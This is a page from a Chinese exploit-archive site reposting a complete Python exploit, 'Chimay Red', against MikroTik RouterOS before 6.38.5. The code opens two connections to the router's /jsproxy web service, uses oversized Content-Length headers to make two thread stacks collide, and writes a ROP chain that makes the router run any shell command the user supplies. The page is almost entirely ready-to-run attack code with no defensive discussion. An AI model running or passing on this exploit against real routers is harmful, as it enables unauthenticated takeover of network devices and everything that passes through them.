首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MikroTik RouterOS < 6.38.5 Remote Command Execution Exploit
来源:vfocus.net 作者:bot 发布时间:2018-01-24  
#!/usr/bin/env python2
  
# Mikrotik Chimay Red Stack Clash Exploit by wsxarcher (based on BigNerd95 POC)
  
# tested on RouterOS 6.38.4 (x86)
  
# ASLR enabled on libs only
# DEP enabled
  
import socket, time, sys, struct
from pwn import *
import ropgadget
  
AST_STACKSIZE = 0x20000 # stack size per thread (128 KB)
SKIP_SPACE    =  0x1000 # 4 KB of "safe" space for the stack of thread 2
ROP_SPACE     =  0x8000 # we can send 32 KB of ROP chain!
  
ALIGN_SIZE    = 0x10 # alloca align memory with "content-length + 0x10 & 0xF" so we need to take it into account
ADDRESS_SIZE  =  0x4 # we need to overwrite a return address to start the ROP chain
  
context(arch="i386", os="linux", log_level="WARNING")
  
gadgets = dict()
plt = dict()
strings = dict()
system_chunks = []
cmd_chunks = []
  
def makeHeader(num):
    return bytes("POST /jsproxy HTTP/1.1\r\nContent-Length: ") + bytes(str(num)) + bytes("\r\n\r\n")
  
def makeSocket(ip, port):
    s = socket.socket()
    try:
        s.connect((ip, port))
    except:
        print("Error connecting to socket")
        sys.exit(-1)
    print("Connected")
    time.sleep(0.5)
    return s
  
def socketSend(s, data):
    try:
        s.send(data)
    except:
        print("Error sending data")
        sys.exit(-1)
    print("Sent")
    time.sleep(0.5)
  
def ropCall(function_address, *arguments):
  
    payload = struct.pack('<L', function_address)
  
    num_arg = len(arguments)
  
    if num_arg > 0:
  
        if num_arg == 1:
            ret_gadget = gadgets['p']
        elif num_arg == 2:
            ret_gadget = gadgets['pp']
        elif num_arg == 3:
            ret_gadget = gadgets['ppp']
        elif num_arg == 4:
            ret_gadget = gadgets['pppp']
        else:
            raise
  
        payload += struct.pack('<L', ret_gadget)
  
        for arg in arguments:
            payload += struct.pack('<L', arg)
  
    return payload
  
# pwntools filters out JOP gadgets
def ropSearchJmp(elf, instruction):
    oldargv = sys.argv
    sys.argv = ['ropgadget', '--binary', elf.path, '--only', 'jmp']
    args = ropgadget.args.Args().getArgs()
    core = ropgadget.core.Core(args)
    core.do_binary(elf.path)
    core.do_load(0)
  
    sys.argv = oldargv
  
    for gadget in core._Core__gadgets:
        address = gadget['vaddr'] - elf.load_addr + elf.address
        if gadget['gadget'] == instruction:
            return address
  
    raise
  
def loadOffsets(binary, shellCmd):
    elf = ELF(binary)
    rop = ROP(elf)
  
    # www PLT symbols
    plt["strncpy"] = elf.plt['strncpy']
    plt["dlsym"]   = elf.plt['dlsym']
  
    # Gadgets to clean the stack from arguments
    gadgets['pppp'] = rop.search(regs=["ebx", "esi", "edi", "ebp"]).address
    gadgets['ppp'] = rop.search(regs=["ebx", "ebp"], move=(4*4)).address
    gadgets['pp'] = rop.search(regs=["ebx", "ebp"]).address
    gadgets['p'] = rop.search(regs=["ebp"]).address
  
    # Gadget to jump on the result of dlsym (address of system)
    gadgets['jeax'] = ropSearchJmp(elf, "jmp eax")
  
    system_chunks.extend(searchStringChunksLazy(elf, "system\x00"))
    cmd_chunks.extend(searchStringChunksLazy(elf, shellCmd + "\x00"))
  
    # get the address of the first writable segment to store strings
    writable_address = elf.writable_segments[0].header.p_paddr
  
    strings['system'] = writable_address
    strings['cmd']    = writable_address + 0xf
  
def generateStrncpyChain(dst, chunks):
    chain = ""
    offset = 0
    for (address, length) in chunks:
        chain += ropCall(plt["strncpy"], dst + offset, address, length)
        offset += length
  
    return chain
  
# only search for single chars
def searchStringChunksLazy(elf, string):
    chunks = []
    for b in string:
        res = [_ for _ in elf.search(b)]
        if len(res) > 0:
            chunks.append((res[0], 1))
        else:
            raise
  
    if len(string) != len(chunks):
        raise
  
    return chunks
  
# [bugged, some problem with dots, not used]
# search chunks of string
def searchStringChunks(elf, string):
    chunks = []
    total = len(string)
  
    if string == "":
        raise
  
    looking = string
  
    while string != "":
        results = [_ for _ in elf.search(looking)]
  
        if len(results) > 0:
            chunks.append((results[0], len(looking)))
            string = string[len(looking):]
            looking = string
        else:   # search failed
            looking = looking[:-1] # search again removing last char
  
    check_length = 0
    for (address, length) in chunks:
        check_length = check_length + length
  
    if check_length == total:
        return chunks
    else:
        raise
  
def buildROP(binary, shellCmd):
    loadOffsets(binary, shellCmd)
  
    # ROP chain
    exploit  = generateStrncpyChain(strings['system'], system_chunks) # w_segment = "system"
    exploit += generateStrncpyChain(strings['cmd'], cmd_chunks)       # w_segment = "bash cmd"
    exploit += ropCall(plt["dlsym"], 0, strings['system']) # dlsym(0, "system"), eax = libc.system
    exploit += ropCall(gadgets['jeax'], strings['cmd'])    # system("cmd")
  
    # The server is automatically restarted after 3 secs, so we make it crash with a random address
    exploit += struct.pack('<L', 0x13371337)
  
    return exploit
  
def stackClash(ip, port, ropChain):
  
    print("Opening 2 sockets")
  
    # 1) Start 2 threads
    # open 2 socket so 2 threads are created
    s1 = makeSocket(ip, port) # socket 1, thread A
    s2 = makeSocket(ip, port) # socket 2, thread B
  
    print("Stack clash...")
  
    # 2) Stack Clash
    # 2.1) send post header with Content-Length bigger than AST_STACKSIZE to socket 1 (thread A)
    socketSend(s1, makeHeader(AST_STACKSIZE + SKIP_SPACE + ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread A will point inside the stack frame of thread B (the post_data buffer will start from here)
  
    # 2.2) send some bytes as post data to socket 1 (thread A)
    socketSend(s1, b'A'*(SKIP_SPACE - ALIGN_SIZE - ADDRESS_SIZE)) # increase the post_data buffer pointer of thread A to a position where a return address of thread B will be saved
  
    # 2.3) send post header with Content-Length to reserve ROP space to socket 2 (thread B)
    socketSend(s2, makeHeader(ROP_SPACE)) # thanks to alloca, the Stack Pointer of thread B will point where post_data buffer pointer of thread A is positioned
  
    print("Sending payload")
  
    # 3) Send ROP chain
    socketSend(s1, ropChain) # thread A writes the ROP chain in the stack of thread B
  
    print("Starting exploit")
  
    # 4) Start ROP chain
    s2.close() # close socket 2 to return from the function of thread B and start ROP chain
  
    print("Done!")
  
if __name__ == "__main__":
    if len(sys.argv) == 5:
        ip       = sys.argv[1]
        port     = int(sys.argv[2])
        binary   = sys.argv[3]
        shellCmd = sys.argv[4]
  
        print("Building ROP chain...")
        ropChain = buildROP(binary, shellCmd)
        print("The ROP chain is " + str(len(ropChain)) + " bytes long (" + str(ROP_SPACE) + " bytes available)")
  
        stackClash(ip, port, ropChain)
    else:
        print("Usage: ./StackClashROPsystem.py IP PORT binary shellcommand")

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Asus Unauthenticated LAN Remot
·GoAhead Web Server LD_PRELOAD
·Photography CMS 1.0 - Cross-Si
·Kaltura Remote PHP Code Execut
·HP Connected Backup 8.6/8.8.6
·Sync Breeze Enterprise 9.5.16
·RAVPower 2.000.056 - Memory Di
·RAVPower 2.000.056 - Root Remo
·MixPad 5.00 - Buffer Overflow
·Oracle VirtualBox < 5.1.30 / <
·NEC Univerge SV9100/SV8100 Web
·AsusWRT Router < 3.0.0.4.380.7
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved